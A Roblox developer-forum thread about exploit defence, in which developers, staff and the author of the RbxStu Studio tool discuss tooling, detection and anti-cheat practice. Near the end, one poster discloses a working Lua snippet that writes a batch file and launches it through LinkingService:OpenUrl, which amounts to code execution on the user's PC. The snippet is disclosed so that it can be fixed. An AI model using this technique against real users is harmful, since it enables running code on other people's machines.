My game was recently targeted by an exploit that allowed users to automatically complete certain game-wide actions that sped up the process for acquiring an ingame UGC item. A Youtube video got 2,000 views over a matter of hours, and hundreds of players were exploiting it.

I was able to implement and push a fix as well as detecting all users using it within 3-4 hours of the exploit being released (I was asleep the first 3 hours or so), and since then I have tracked down the GitHub repository of the bad actor, with exploits for many games as well as my own, and deobfuscated what I can manage to, with not much success.

In this case, I benefited massively from having very intimate knowledge of exactly how my game’s networking works. On seeing the exploit it was immediately obvious to me what the resolution would need to be because of that, and I was able to very quickly push out a fix. However, still to this point I have absolutely no knowledge of what the script itself does, I haven’t seen it, I got as far as deobfuscating and reverse engineering enough to find a single loadstring that brought in the UI Library, but not the actual script logic itself. With this instance I can guess pretty accurately what the script is doing, and I’m confident in most cases I could do the same as I’m always going to have a better understanding of my game than a bad actor does.

It is not the obfuscation making it difficult, it's Roblox's own limits on the permissions of developers in Studio

Here is my issue. Bad actors and the players who make use of these exploits have more access than developers themselves. They are free to access CoreScripts, CoreGui, essentially they have complete control over the game client as Roblox does. We as developers do not get the same special treatment.

What stopped me investigating further was that at every turn I was coming up against Roblox’s own permissioning blocking me. Not only do I have to deobfuscate the script, I have to somehow try and find alternatives to the services the script is using that I do have permissions for to test it, so that I can monitor what the script is doing, and in most cases there is no suitable alternative.

I feel that Roblox has, nobly, but misguidedly taken the weight of exploit prevention on their own shoulders, when this is simply not a realistic goal. No matter how much client detection is done on Roblox’s end, it will never be enough to prevent exploiters from running code clientside. In fact I feel that the recent hype around the improvements to anti exploit have had a negative affect and caused developers to become more complacent than ever, believing that Roblox will take care of the anti-exploit side.

Roblox need to offer the tools developers need to take exploit detection and prevention into their own hands, rather than restricting developers

A developer will always have a better idea of what’s going on in their game code than Roblox does. Universal anti-exploit can only work to a certain extent, the endless nuances of individual experiences mean that there will always be areas that are not covered.

While I am very happy to see Roblox taking the issue seriously on their end, they must understand that this is not a problem that can be addressed on just one side. I believe the standard of safety and fairness will be improved much more significantly by handing the power to developers than it is through platform-wide detection.

It is well known that there are multiple programs that offer this level of access. Developers currently have very few options to test with anything like that level of privilege, and the ways that are available come with inherent and very real risk. Running exploit code as a local plugin could potentially give a bad actor unfettered access to your game code if written to detect that it’s running in that environment. Developers are obviously not expected to download or subscribe to one of these programs themselves, either, I image this would be a bannable offense.

We are fighting on the losing side, and it’s not because we’re not able or motivated, it’s because Roblox is treating developers in the same way it treats bad actors, only we are trying to stick by the rules and they are not. The current state of things puts developers and players at risk.

A very high level suggestion

Roblox knows better than me how this can be done in a way that has a net positive impact. Though I feel that even in the worst case, where such a service was used by exploiters themselves to develop exploits, it at least puts us on an equal playing field with them - and I think we would win. We are the people who spend years learning and hundreds or thousands of hours creating experiences, the people who write these exploits are far less capable.

A sandboxed environment where we can run exploit code against our experiences, or simply the ability to use sensitive services in a testing environment would put us there. Such a program could be invite only, it could be heavily monitored, but it needs to exist.

The trouble is that it’s hard for us to differentiate between the two. In practice, we cannot, since Roblox users as a group include developers and bad actors. Even if we facilitated privileged execution on Studio for specific developers, this could feasibly be abused by bad actors in phishing-style campaigns.

This is a scenario in which I think case-specific solutions and approaches from within the developer community are more appropriate. It would be a huge risk for us to facilitate any of this on our end – a risk we cannot stomach.

just white-list studio entirely /s

I appreciate the reply and I understand the difficulty of this, but I do feel that there has to be an approach that can give us more insight into how our games are being abused. One example of this could be highlighting specific remote events or attack vectors used by exploits detected by Roblox. I assume Roblox has some level of clientside monitoring and does detect the use of some exploits beyond a reasonable doubt (as has to be the case for moderation action).

To prevent this being used to reverse engineer or work against Roblox’s detection itself, it could be obscured away from specific exploits or users and instead be as simple as detecting unusual activity on network events and telling the developer about this spike or pattern change.

I understand that much of what would be needed is quite complex to go about but I think an overall approach of permissioning developers to access more insights into exploiter activity based on a Roblox → Developer model where this only happens when automated systems detect unusual activity (activity Roblox would not have the certainty to penalise but doesn’t look natural) could be the beginning of a direction that doesn’t give free universal access to these tools.

The best solution for developers isn’t the only solution and I think all developers understand that it has to be balanced and achievable. Server-side only detection on remotes could be a start that doesn’t require clientside access, the best possible scenario would be that Roblox is able to take an approach similar to antivirus companies, where automated systems detect unusual behaviour where there is a similar pattern across it, and potentially in this case provide the developer with some kind of reproduction environment, from as simple as the trail of events that follow that pattern, to the higher end where if possible, Roblox is able to offer the developer a sandboxed environment for that specific exploit to reproduce it’s effects.

There are some open source tools that you can use to test out the integrity of your game’s security via studio, the most noteable one being RbxStu which is essentially an exploit but for studio ( it’s against TOS to modify studio but it’s not really enforced in this case as it’s beneficial to developers and also they do not have any anti-cheat on studio so you can use it without worry ). Or if you’re not comfortable and or experienced enough to try that out I’d be more than happy to assist you with your issue via PMs, I have lots of experience dealing with exploiters and securing games.

Appreciate you letting me know about the plugin, I’ll have a look and if it’s what I think it is it likely helps with pentesting to preemptively find potential attack vectors, which is certainly useful but in this case it doesn’t resolve the overall issue.

The exploit here was relatively low impact as I’ve taken a strict approach to network security for years now, the real reason it wasn’t completely secure is that a feature which was previously relatively low impact on the games progression was used as one of the criteria for a UGC quest. I didn’t implement exhaustive server side checks simply because it didn’t seem necessary for the use of the event at the time in comparison to the performance hit additional validation would cause. In reality this is a trade off you always have to deal with - this case was exploited because of no proximity check to the object being interacted with.

So, there is no issue with the game currently, but the experience made me realise how helpless I would be in the case that a serious exploit comes along that is much more complex in nature. It also made me realise that this exploit may have been used far into the past before it became this public, and I had no way of knowing this, and there may be others. Even if I discover those in future, the process of fixing the issues in those cases is likely to be a long process without the ability to reverse engineer the exploits themselves.

Edit: Is using something like RbxStu mentioned above allowed? @e_w00k

Ultimately I don’t think we can encourage or endorse the use of external tooling like RbxStu, but I can say we have absolutely no plans as of this post to police Studio with anticheat. So, as of now it’s possible to use tools like these without concern of the usage of these being moderated/detected.

Obviously outside of Studio this is a different story, and also this should not be taken as blanket permission to use tools like these since this breaks our ToS. All I can say is there’s no anticheat in Studio and no plans to add it there as of now.

Whilist I created RbxStu for the purposes of pentesting your own games, it is meant really to execute untrusted exploiter code. As such I didn’t want to risk some things, this is why things like the UNC IO library are NOT in, and might never be in, as such I wanted to avoid as much as possible implementing vulnerable things, but it is just really impossible, as an exploit environment like so has primitives like game:HttpGet and hookfunction that allow you to break out of sandbox easily and break a games’ entire integrity. Whilist i tried to secure some of the functions you may have available at high contexts it is still risky to run RbxStu until I do either of two things:

1 - Close source

Make RbxStu closed source how it was originally going to be, this completely stops from knowledgable exploiters from looking through the code and exploiting vulnerabilities that despite might have been clear to them, were not for me, however, this is unfeasable for many reasons.

2 - Open source, but complete rewrite

Continue RbxStu as an open source project, but rewrite it from scratch, something like a V2, with better structure overall, and perhaps completely automatic updating, as Roblox Studio does not have any agressive protections like shuffling structs.

Whilist the RbxStu was never made to cause damage to Roblox as a platform at any point and I haven’t heard of it much more than from some friends using it to patch scripts or antitamper/cheat development for their games, all of this without using any third party tools that might compromise their system as I provide the source and DLL for you to inject into your studio if you want to do anything, I try as much as possible to make it easy to find what the script may be using to do anything to the game (including exploit functions). Thanks to RbxStu me and @shadowmaster940 are working on another project, that for now goes unspecified, but that it would virtually be some kind of generic anti-tamper, and that would be open source, but i digress.

It is completely understandable that roblox does not endorse the tool, it goes directly towards their ToS, and they would not want to make an exploiter-like tool neither, becuase when implementing libraries such as io and others, if those are vulnerable, its not as simple as “It is a third party” it would be Roblox the one allowing it, not you going out of your way to get external tooling.

(And yes RbxStu may eventually get a rewrite to be much more stable, but until then its just too sporadic on what stability refers to, so if you DO choose to use it, bear in mind your studio will crash most likely, and even then you will have to roll back to an older version, as I haven’t had the time to update the offsets to the latest studio version).

I appreciate you replying here. I also think this situation perfectly captures the issue developers face that is part of what I’m trying to highlight generally to the community and perhaps contribute to pushing for change in some way.

Roblox treats all users equally and I have a lot of respect for that approach, I don’t think it should change, it’s one of the core premises the platform was built on and thrives on.

However, it also results in this awful situation developers find themselves in. I, the same as the vast majority of developers, have never written a single line of code with malicious intent in my life. We dedicate our lives to creating these games while we work on them. Exploits can destroy that work. I don’t blame the people who wrote them or Roblox for their existence, I simply want to fix them and prevent them. The people who create them have very little to lose, their livelihoods don’t depend on a single Roblox account, they won’t lose years of work if they’re banned. We will.

I can’t download one of these script executors, I doubt I would be treated any differently by the systems and moderators if detected using one in my own game. What are we supposed to do? Use an old laptop with a VPN and a new account, hoping it doesn’t disconnect and we are grouped in with the people we are trying to fight against? I wouldn’t risk it.

@roalex2008 here is trying to do something good. They should be appreciated for that, but instead they have to constantly worry that what they are working on might go against the ToS. I don’t mean this against any Roblox staff in this thread but against the way things are in general. We don’t feel safe combatting this in the only ways that are really possible and it’s not the exploiters that we are most scared of, it’s Roblox itself.

And I should say that I’m not at all trying to say that all exploits require this, in most cases securing a game from a known or unknown exploit can be done with enough knowledge but it’s just not always the case. I doubt Roblox would be anywhere near as effective at site and engine security if it wasn’t for your ability to reverse engineer known exploits in a privileged sandboxed environment.

Understood.

Another suggestion I would make generally is a program of trusted developers where we can submit exploits we are struggling with to Roblox, perhaps only in extreme/ specific cases based on criteria. If Roblox must keep such an environment private then a developer program like this could centralise efforts against common obfuscation techniques, and provide those staff with continuous insight into the latest methods being used, and give a place for developers and the security team to work together and directly benefit developers at the same time.

The big issue isn’t with fixing an exploit once we know what it’s doing, it’s that these days they are so heavily obfuscated there’s little option but to reverse engineer them to try and figure out what they’re even doing.

I mean, I used to be an exploiter, the fun wears off in games to simply, its not worth it to exploit at all. The only times I “Exploit” now is with auto clickers, and that is on really abusive games with the player, filled with dark patterns that make them unplayable.

Roblox is not particularly looming against me I’d say, I have said many times I have no problem with taking down RbxStu if any Roblox staff is concerned about it having some reprecussion, I’m open to taking it down, archiving/deleting the repo and keeping it for private use only.

Still, some people say “Validation fixes everything!”, it really does do wonders, but people undermine the power a client has in games like Obby’s, for example, where kill bricks can be completely deactivated with some little mangling.

I truly do NOT recommend you use any executor, at ALL. I know some of the owners, they’re good and sometimes fairly goofy, the Solara owner does it for literal learning, which I find amusing, but the problem is, you should not benefit the cheating industry, and if you do, you will end up getting banned eventually, as EVERYTHING that is currently released is detected, and Hyperion will not make any “Ah you’re doing it with good intent” kind of deal, they will whack you straight up, and that is great tbf.

RbxStu is practically a learning project, I took various actual client exploits, and just started experimenting with how they implemented custom functions and other deals, the way of getting the state IS unstable, and that really cannot change unless I rewrite it, which i don’t really know when i will.

As a rule of thumb for exploit protection: Don’t trust the client, treat your remote inputs as the devil, if you are willing to sacrifice developer experience for security, turn to using something like ByteNet or Zap, they’re net libs that essentially make all your networking go through buffers, and makes exploiting much tougher when your data goes through remotes becuase you simply cannot peek in to see what happens, normally this will fend off most people who just don’t care enough or aren’t determined enough, if you’re worried about your environment being hooked, you can try running some important parts of the game inside of Actor | Documentation - Roblox Creator Hub, which despite not being an anticheat tool per say, makes a whole new Lua VM where the scripts run, making so hooking is basically impossible unless they have a function called run_on_actor, which allows them to execute code in them, most fancy games, like Phantom Forces use actors on their anti-cheat stack for reasons like that.

You can also improve the game by adding Delayed bans, why you may ask? Delayed bans makes it so if you detect something, it doesn’t scream at the player “I detected you, cheater” it rather sends them as “i bypassed this, fool developer”, but in reality, it is just a honeypot, and when they release the detected feature, all the ones who cheated, are now detected, flagged and will, eventually, get banned.

As much as we want to do something about obfuscation, it will never really be “solved”, what you can do is make detections for their UIs, most exploiters use the same UI library like rayfield. This allows you to just detect that UI lib, and make them unable to do anything about it, anti-cheat things are mostly @shadowmaster940’s stuff, I’m mostly just playing around and learning myself on the go, which as a side effect resulted on the little experiment i wrote with shadow, which is like a weird general purpose anti-tamper, it can be found on my github as “zoop”, but its too experimental, and straight up has little to no detections in place to do much to really recommend it, as deobfuscation was really something out of the window, I simply wrote RbxStu, and wrote some cheap and simple “Environment Instrumentation” as i call it, which just shows me what calls the exploit environment makes and you can get one or two things from the script that way, while trying to replicate exploit behaviour to let it continue, I sadly can not ever see RbxStu in action, as I have never done a game by myself that has gotten other exploiters’ attention.

These library names are incredible

I mean, this all sounds great. I will likely check it out, and thanks for the warnings regarding the stability of it. Do you recommend any particular safeguards in place to prevent any kind of lasting damage in the worst case from one of these scripts should they be written maliciously against reverse engineering itself? Is running in a baseplate enough, or do I need to be more careful than that

I’d probably say running it on a game copy, as in, a local place copy could solve some of the issues relating to security, but then it may act weirdly, the problem is I’m yet to see a script that directly attacks RbxStu, so for now I’m at a miss if it is happening sadly. That aside.

There are some checks to protect against malicious malicious scripters, as I’d call them. There are metamethod hooks set on the DataModel to prevent indexing services and functions deemed dangerous, if there are bypasses for them, I have not been aware of them, however when I first had the chance to check the security of RbxStu regarding env stuff, I checked with a script made by someone and it passed all it’s tests, so you have that as a “Passes Vulnerability Check!” trademark I suppose, but it’s not enough, when performing HttpGet it will block discord webhooks, so you’re not logged for example, in the future I’d like that feature to extend to a list of blocked URLs or something along those lines

The code below achieves arbitrary code execution in RLua environments with a thread identity higher than 2! Run batch files, powershell files, anything you can think of! In the PC of Roblox Exploiters!

(Works in RbxStu!)

ScriptContext = game:FindService('ScriptContext')
LinkingService = game:FindService('LinkingService')

Code = "@echo off\nstart https://www.roblox.com/users/4497609693/profile"
Name = "omg.bat"
Path = ScriptContext:SaveScriptProfilingData(Code, Name) -- creates an omg.bat file with the code inside it, then returns the path to the batch file

-- opens the bat file resulting in arbitrary code execution
print(LinkingService:OpenUrl(Path)) -- if returned true, successful code execution

alright? I don’t know what you expect me to tell you honestly, as I said before, I have to rewrite the entire thing either way, surely if you have enough time to find things like this, then you have enough time to do something that benefits it as a whole or make a better version of it, so be my guest.

Besides the point, LinkingService is relatively new, never heard of it, it was practically added a month ago, coincidentally, the last RbxStu commit was ALSO a month ago, shocker, I’m not going to constantly check the update list for services that can be exploited like this, and what you pointed out about on identities superior than 2 may not be true, because pretty sure Plugins run at higher contexts and they most likely aren’t affected by it, since Roblox 100% wouldn’t allow that behaviour to happen either way…

I’ll update RbxStu to hot fix the vulnerability tomorrow.

I was working on a project “Drainer Drainer 123” which is aimed to test almost all vulnerabilities possible in Roblox Executors such as the one made by the very incompetent developer rexi, called Wave. I read this thread at the time that I had that code copied, and I saw that you said “I’m yet to see a script that directly attacks RbxStu” so I thought why not quickly paste it, lol.

Oh and, I’m pretty sure Plugins run at PluginSecurity which is identity 1. I may be wrong though.

Last I checked PluginSecurity was more than LocalUser (Context wise) and identity wise I think they were level 5, either way Rexi is complete garbage, I once spoke to the guy, he kept insulting over my country of origin non stop lol.

As for the vulnerability checker, good you wrote one, because actual true exploits these days aren’t even held to scrutiny they used to originally have so in general they’re much more vulnerable, that being said RbxStu hasn’t updated in a month, and pretty much this service was added a month ago, coincidences are annoying, either way good work and thanks for informing about it, I already informed in my server about it, I’ll deploy a Hotfix for it later tomorrow

Plugin is indeed 5

The security of exploits fell off significantly since Synapse’s departure, all of the biggest nobodies in the community have but a clue on how to properly secure their exploits.

Wave is a great example of this, there are multiple unpatched RCE’s, multiple detection methods, no clue how they expect to remain undetected from Hyperion if they can’t even remain undetected from game developers.

Solara is obviously a little harder, they’re external so their custom environment is non-existent, though you can still do the good ol’ preloadasync attacks on the stupid drawing library they use.

Anyways.

If you’re a game developer and still have issues with these exploits, feel free to DM me for a detection or two